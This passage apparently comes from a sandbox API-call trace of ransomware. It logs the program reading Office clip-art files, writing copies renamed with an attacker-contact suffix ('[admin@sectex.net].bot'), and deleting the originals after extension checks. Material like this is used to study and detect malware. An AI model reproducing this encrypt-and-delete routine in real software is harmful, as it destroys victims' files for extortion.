	[0056.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.837] lstrlenW (lpString=".doc") returned 4
	[0056.837] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.837] lstrlenW (lpString=".docx") returned 5
	[0056.837] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.838] lstrlenW (lpString=".pdf") returned 4
	[0056.838] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.838] lstrlenW (lpString=".xls") returned 4
	[0056.838] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.838] lstrlenW (lpString=".xlsx") returned 5
	[0056.838] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.838] lstrlenW (lpString=".ppt") returned 4
	[0056.838] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.838] lstrlenW (lpString=".zip") returned 4
	[0056.838] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.838] lstrlenW (lpString=".rar") returned 4
	[0056.838] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.838] lstrlenW (lpString=".bz2") returned 4
	[0056.838] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.838] lstrlenW (lpString=".7z") returned 3
	[0056.839] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.839] lstrlenW (lpString=".dbf") returned 4
	[0056.839] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.839] lstrlenW (lpString=".1cd") returned 4
	[0056.839] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.839] lstrlenW (lpString=".jpg") returned 4
	[0056.839] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.839] lstrlenW (lpString=".doc") returned 4
	[0056.839] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.839] lstrlenW (lpString=".docx") returned 5
	[0056.839] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.839] lstrlenW (lpString=".pdf") returned 4
	[0056.839] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.839] lstrlenW (lpString=".xls") returned 4
	[0056.839] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.839] lstrlenW (lpString=".xlsx") returned 5
	[0056.839] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.839] lstrlenW (lpString=".ppt") returned 4
	[0056.839] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.839] lstrlenW (lpString=".zip") returned 4
	[0056.839] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.839] lstrlenW (lpString=".rar") returned 4
	[0056.839] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.839] lstrlenW (lpString=".bz2") returned 4
	[0056.839] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.839] lstrlenW (lpString=".7z") returned 3
	[0056.839] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.840] lstrlenW (lpString=".dbf") returned 4
	[0056.840] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.840] lstrlenW (lpString=".1cd") returned 4
	[0056.840] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63
	[0056.840] lstrlenW (lpString=".jpg") returned 4
	[0056.840] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.840] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.840] lstrlenW (lpString="AG00176_.GIF") returned 12
	[0056.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.840] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=3120) returned 1
	[0056.840] CloseHandle (hObject=0x1f8) returned 1
	[0056.840] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 0x20
	[0056.840] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.841] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.841] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238
	[0056.841] GetLastError () returned 0x0
	[0056.841] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xc30, lpOverlapped=0x0) returned 1
	[0056.842] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xc40, lpOverlapped=0x0) returned 1
	[0056.843] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.843] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.843] SetEndOfFile (hFile=0x238) returned 1
	[0056.843] CloseHandle (hObject=0x238) returned 1
	[0056.844] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.844] SetEndOfFile (hFile=0x1f8) returned 1
	[0056.844] CloseHandle (hObject=0x1f8) returned 1
	[0056.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 1
	[0056.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.845] lstrlenW (lpString=".doc") returned 4
	[0056.845] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.845] lstrlenW (lpString=".docx") returned 5
	[0056.845] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.845] lstrlenW (lpString=".pdf") returned 4
	[0056.845] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.845] lstrlenW (lpString=".xls") returned 4
	[0056.845] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.845] lstrlenW (lpString=".xlsx") returned 5
	[0056.845] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.845] lstrlenW (lpString=".ppt") returned 4
	[0056.845] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.845] lstrlenW (lpString=".zip") returned 4
	[0056.845] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.845] lstrlenW (lpString=".rar") returned 4
	[0056.845] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.845] lstrlenW (lpString=".bz2") returned 4
	[0056.845] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.845] lstrlenW (lpString=".7z") returned 3
	[0056.845] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.846] lstrlenW (lpString=".dbf") returned 4
	[0056.846] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.846] lstrlenW (lpString=".1cd") returned 4
	[0056.846] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.846] lstrlenW (lpString=".jpg") returned 4
	[0056.846] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.846] lstrlenW (lpString=".doc") returned 4
	[0056.846] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.846] lstrlenW (lpString=".docx") returned 5
	[0056.846] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.846] lstrlenW (lpString=".pdf") returned 4
	[0056.846] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.846] lstrlenW (lpString=".xls") returned 4
	[0056.846] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.846] lstrlenW (lpString=".xlsx") returned 5
	[0056.846] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.846] lstrlenW (lpString=".ppt") returned 4
	[0056.846] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.846] lstrlenW (lpString=".zip") returned 4
	[0056.846] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.846] lstrlenW (lpString=".rar") returned 4
	[0056.846] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.846] lstrlenW (lpString=".bz2") returned 4
	[0056.846] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.846] lstrlenW (lpString=".7z") returned 3
	[0056.846] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.846] lstrlenW (lpString=".dbf") returned 4
	[0056.846] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.847] lstrlenW (lpString=".1cd") returned 4
	[0056.847] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63
	[0056.847] lstrlenW (lpString=".jpg") returned 4
	[0056.847] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.847] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0056.847] lstrlenW (lpString="AN00010_.WMF") returned 12
	[0056.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.334] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=3026) returned 1
	[0057.334] CloseHandle (hObject=0x1c0) returned 1
	[0057.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 0x20
	[0057.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.334] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.334] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0057.335] GetLastError () returned 0x0
	[0057.335] ReadFile (in: hFile=0x1c0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xbd2, lpOverlapped=0x0) returned 1
	[0057.351] WriteFile (in: hFile=0x188, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xbe0, lpOverlapped=0x0) returned 1
	[0057.353] ReadFile (in: hFile=0x1c0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0057.353] WriteFile (in: hFile=0x188, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0057.353] SetEndOfFile (hFile=0x188) returned 1
	[0057.353] CloseHandle (hObject=0x188) returned 1
	[0057.353] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.353] SetEndOfFile (hFile=0x1c0) returned 1
	[0057.354] CloseHandle (hObject=0x1c0) returned 1
	[0057.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0057.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 1
	[0057.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.355] lstrlenW (lpString=".doc") returned 4
	[0057.355] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0057.355] lstrlenW (lpString=".docx") returned 5
	[0057.355] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0057.355] lstrlenW (lpString=".pdf") returned 4
	[0057.355] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0057.355] lstrlenW (lpString=".xls") returned 4
	[0057.355] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0057.355] lstrlenW (lpString=".xlsx") returned 5
	[0057.355] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0057.355] lstrlenW (lpString=".ppt") returned 4
	[0057.355] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0057.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.355] lstrlenW (lpString=".zip") returned 4
	[0057.355] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0057.355] lstrlenW (lpString=".rar") returned 4
	[0057.355] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0057.355] lstrlenW (lpString=".bz2") returned 4
	[0057.355] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0057.355] lstrlenW (lpString=".7z") returned 3
	[0057.355] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0057.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.355] lstrlenW (lpString=".dbf") returned 4
	[0057.355] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0057.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.355] lstrlenW (lpString=".1cd") returned 4
	[0057.355] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0057.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.355] lstrlenW (lpString=".jpg") returned 4
	[0057.355] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0057.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.356] lstrlenW (lpString=".doc") returned 4
	[0057.356] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0057.356] lstrlenW (lpString=".docx") returned 5
	[0057.356] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0057.356] lstrlenW (lpString=".pdf") returned 4
	[0057.356] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0057.356] lstrlenW (lpString=".xls") returned 4
	[0057.356] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0057.356] lstrlenW (lpString=".xlsx") returned 5
	[0057.356] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0057.356] lstrlenW (lpString=".ppt") returned 4
	[0057.356] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0057.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.356] lstrlenW (lpString=".zip") returned 4
	[0057.356] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0057.356] lstrlenW (lpString=".rar") returned 4
	[0057.356] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0057.356] lstrlenW (lpString=".bz2") returned 4
	[0057.356] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0057.356] lstrlenW (lpString=".7z") returned 3
	[0057.356] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0057.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.356] lstrlenW (lpString=".dbf") returned 4
	[0057.356] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0057.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.356] lstrlenW (lpString=".1cd") returned 4
	[0057.356] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0057.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63
	[0057.356] lstrlenW (lpString=".jpg") returned 4
	[0057.356] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0057.357] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0057.357] lstrlenW (lpString="AN00015_.WMF") returned 12
	[0057.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.357] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=4734) returned 1
	[0057.357] CloseHandle (hObject=0x1c0) returned 1
	[0057.357] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 0x20
	[0057.357] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.357] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.357] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0057.358] GetLastError () returned 0x0
	[0057.358] ReadFile (in: hFile=0x1c0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x127e, lpOverlapped=0x0) returned 1
	[0057.359] WriteFile (in: hFile=0x188, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1280, lpOverlapped=0x0) returned 1
	[0057.360] ReadFile (in: hFile=0x1c0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0057.360] WriteFile (in: hFile=0x188, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0057.360] SetEndOfFile (hFile=0x188) returned 1
	[0057.360] CloseHandle (hObject=0x188) returned 1
	[0057.361] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.361] SetEndOfFile (hFile=0x1c0) returned 1
	[0057.361] CloseHandle (hObject=0x1c0) returned 1
	[0057.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0057.362] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 1
	[0057.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.362] lstrlenW (lpString=".doc") returned 4
